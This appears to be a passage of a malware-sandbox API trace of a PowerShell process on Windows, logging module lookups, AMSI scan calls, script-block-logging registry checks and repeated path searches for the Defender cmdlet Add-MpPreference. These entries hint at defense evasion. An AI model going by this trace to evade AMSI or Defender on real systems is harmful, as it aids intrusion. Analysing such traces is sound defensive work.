(lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1")) returned 0x20 [0342.154] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1")) returned 0x20 [0342.154] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1")) returned 0x20 [0342.154] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\Kds.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\kds.psd1")) returned 0x20 [0342.154] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0342.154] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\vpnclient\\vpnclient.psd1")) returned 0x20 [0342.154] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pcsvdevice\\pcsvdevice.psd1")) returned 0x20 [0342.154] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1")) returned 0x20 [0342.155] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip\\nettcpip.psd1")) returned 0x20 [0342.155] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0342.155] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1")) returned 0x20 [0342.155] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1")) returned 0x20 [0342.157] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting\\windowserrorreporting.psd1")) returned 0x20 [0342.157] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1")) returned 0x20 [0342.157] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.4.0\\pester.psm1")) returned 0x20 [0342.158] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter\\netadapter.psd1")) returned 0x20 [0342.158] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1")) returned 0x20 [0342.158] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting\\windowserrorreporting.psm1")) returned 0x20 [0342.158] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1")) returned 0x20 [0342.158] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac\\Wdac.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\wdac\\wdac.psd1")) returned 0x20 [0342.158] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1")) returned 0x20 [0342.159] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1")) returned 0x20 [0342.159] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1")) returned 0x20 [0342.159] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1")) returned 0x20 [0342.159] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networktransition\\networktransition.psd1")) returned 0x20 Thread: id = 292 os_tid = 0x600 Thread: id = 294 os_tid = 0x690 [0352.333] CoGetContextToken (in: pToken=0x1ab5f700 | out: pToken=0x1ab5f700) returned 0x0 [0352.333] CObjectContext::QueryInterface () returned 0x0 [0352.334] CObjectContext::GetCurrentThreadType () returned 0x0 [0352.334] Release () returned 0x0 Thread: id = 295 os_tid = 0xe90 Thread: id = 296 os_tid = 0xef8 Thread: id = 297 os_tid = 0x854 [0331.116] CoCreateGuid (in: pguid=0x1ac9e0e8 | out: pguid=0x1ac9e0e8*(Data1=0x6aa3ed91, Data2=0x1a2f, Data3=0x4ca0, Data4=([0]=0x9d, [1]=0xb6, [2]=0xf9, [3]=0x4f, [4]=0x5e, [5]=0x4b, [6]=0xd2, [7]=0xa))) returned 0x0 Thread: id = 298 os_tid = 0x107c [0330.887] SetThreadUILanguage (LangId=0x0) returned 0x409 [0330.903] EtwEventRegister () returned 0x0 [0330.903] EtwEventSetInformation () returned 0x0 [0330.966] CoCreateGuid (in: pguid=0x1b62ef98 | out: pguid=0x1b62ef98*(Data1=0xae6ee41, Data2=0x1fe6, Data3=0x4ced, Data4=([0]=0x8e, [1]=0xf9, [2]=0x22, [3]=0xe, [4]=0x11, [5]=0xfe, [6]=0xf2, [7]=0xa2))) returned 0x0 [0330.986] AmsiOpenSession () returned 0x0 [0330.986] AmsiScanBuffer () returned 0x80070015 [0331.058] RoGetParameterizedTypeInstanceIID () returned 0x0 [0331.059] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0331.059] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0331.538] EtwEventRegister () returned 0x0 [0331.540] EtwEventSetInformation () returned 0x0 [0331.541] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62ecb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0331.671] EtwEventActivityIdControl () returned 0x0 [0331.671] EtwEventActivityIdControl () returned 0x0 [0331.671] EtwEventActivityIdControl () returned 0x0 [0331.677] EtwEventActivityIdControl () returned 0x0 [0331.677] EtwEventActivityIdControl () returned 0x0 [0331.677] EtwEventActivityIdControl () returned 0x0 [0331.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b62dba0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0331.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b62dba0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0331.770] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b62dbc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0331.801] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62ed18 | out: phkResult=0x1b62ed18*=0x0) returned 0x2 [0331.802] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62ed18 | out: phkResult=0x1b62ed18*=0x0) returned 0x2 [0331.804] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b62db70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0331.878] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62e680, nSize=0x80 | out: lpBuffer="") returned 0x0 [0331.881] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b62e4e0, nSize=0x80 | out: lpBuffer="") returned 0xf1 [0331.881] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b62e400, nSize=0xf1 | out: lpBuffer="") returned 0xf0 [0331.882] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b62e3c0, nSize=0xf1 | out: lpBuffer="") returned 0x3a [0331.892] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1a808790 | out: lpBuffer="C:\\Users\\OqXZRaykm\\Desktop") returned 0x1a [0331.896] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b62e3c0, nSize=0xf1 | out: lpBuffer="") returned 0x3a [0331.898] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x104, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0331.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e388) returned 1 [0331.898] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6b0 | out: lpFileInformation=0x1b62e6b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xb7b90b2d, ftCreationTime.dwHighDateTime=0x1d94216, ftLastAccessTime.dwLowDateTime=0xb7b90b2d, ftLastAccessTime.dwHighDateTime=0x1d94216, ftLastWriteTime.dwLowDateTime=0xb7b90b2d, ftLastWriteTime.dwHighDateTime=0x1d94216, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0331.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e338) returned 1 [0331.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e618) returned 1 [0331.900] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0331.900] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x39, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0331.901] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Add-MpPreference.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\add-mppreference.*"), lpFindFileData=0x1b62e3c0 | out: lpFindFileData=0x1b62e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0331.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e2e8) returned 1 [0331.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e4f8) returned 1 [0331.904] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b62d3e0, nSize=0xf1 | out: lpBuffer="") returned 0x0 [0331.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0331.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0331.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e388) returned 1 [0331.904] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6b0 | out: lpFileInformation=0x1b62e6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a6eea36, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x43bf057f, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xceac89c9, ftLastWriteTime.dwHighDateTime=0x1d9a995, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0331.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e338) returned 1 [0331.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e618) returned 1 [0331.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0331.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0331.906] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Add-MpPreference.*" (normalized: "c:\\windows\\system32\\add-mppreference.*"), lpFindFileData=0x1b62e3c0 | out: lpFindFileData=0x1b62e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0331.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e2e8) returned 1 [0331.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e4f8) returned 1 [0331.907] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0331.907] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0331.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e388) returned 1 [0331.907] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6b0 | out: lpFileInformation=0x1b62e6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a6eea36, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x43bf057f, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x4016bb7c, ftLastWriteTime.dwHighDateTime=0x1da42db, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0331.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e338) returned 1 [0331.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e618) returned 1 [0331.907] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0331.907] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0331.908] FindFirstFileW (in: lpFileName="C:\\Windows\\Add-MpPreference.*" (normalized: "c:\\windows\\add-mppreference.*"), lpFindFileData=0x1b62e3c0 | out: lpFindFileData=0x1b62e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0331.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e2e8) returned 1 [0331.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e4f8) returned 1 [0331.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0331.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0331.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e388) returned 1 [0331.908] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6b0 | out: lpFileInformation=0x1b62e6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89916a9, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x259cdfef, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x9b9fc00d, ftLastWriteTime.dwHighDateTime=0x1d94219, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0331.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e338) returned 1 [0331.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e618) returned 1 [0331.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0331.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0331.909] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Add-MpPreference.*" (normalized: "c:\\windows\\system32\\wbem\\add-mppreference.*"), lpFindFileData=0x1b62e3c0 | out: lpFindFileData=0x1b62e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0331.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e2e8) returned 1 [0331.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e4f8) returned 1 [0331.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0331.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0331.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e388) returned 1 [0331.910] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6b0 | out: lpFileInformation=0x1b62e6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x43bf057f, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xf00bc16c, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0331.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e338) returned 1 [0331.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e618) returned 1 [0331.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0331.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0331.910] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Add-MpPreference.*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\add-mppreference.*"), lpFindFileData=0x1b62e3c0 | out: lpFindFileData=0x1b62e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0331.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e2e8) returned 1 [0331.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e4f8) returned 1 [0331.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\OpenSSH\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0331.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\OpenSSH\\", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\OpenSSH\\", lpFilePart=0x0) returned 0x1c [0331.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e388) returned 1 [0331.911] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\OpenSSH\\" (normalized: "c:\\windows\\system32\\openssh"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6b0 | out: lpFileInformation=0x1b62e6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc35557df, ftCreationTime.dwHighDateTime=0x1d5ace3, ftLastAccessTime.dwLowDateTime=0x259cdfef, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xc35557df, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0331.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e338) returned 1 [0331.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e618) returned 1 [0331.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\OpenSSH\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0331.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\OpenSSH\\", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\OpenSSH\\", lpFilePart=0x0) returned 0x1c [0331.912] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\OpenSSH\\Add-MpPreference.*" (normalized: "c:\\windows\\system32\\openssh\\add-mppreference.*"), lpFindFileData=0x1b62e3c0 | out: lpFindFileData=0x1b62e3c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0331.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e2e8) returned 1 [0331.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e4f8) returned 1 [0331.914] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0331.914] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x37, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps", lpFilePart=0x0) returned 0x36 [0331.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e388) returned 1 [0331.914] GetFileAttributesExW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windowsapps"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6b0 | out: lpFileInformation=0x1b62e6b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x328a853a, ftCreationTime.dwHighDateTime=0x1d94219, ftLastAccessTime.dwLowDateTime=0x259cdfef, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x52077e10, ftLastWriteTime.dwHighDateTime=0x1d94212, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0331.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e338) returned 1 [0331.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e618) returned 1 [0331.914] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\WindowsApps", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0331.914] GetFullPathNameW (in: 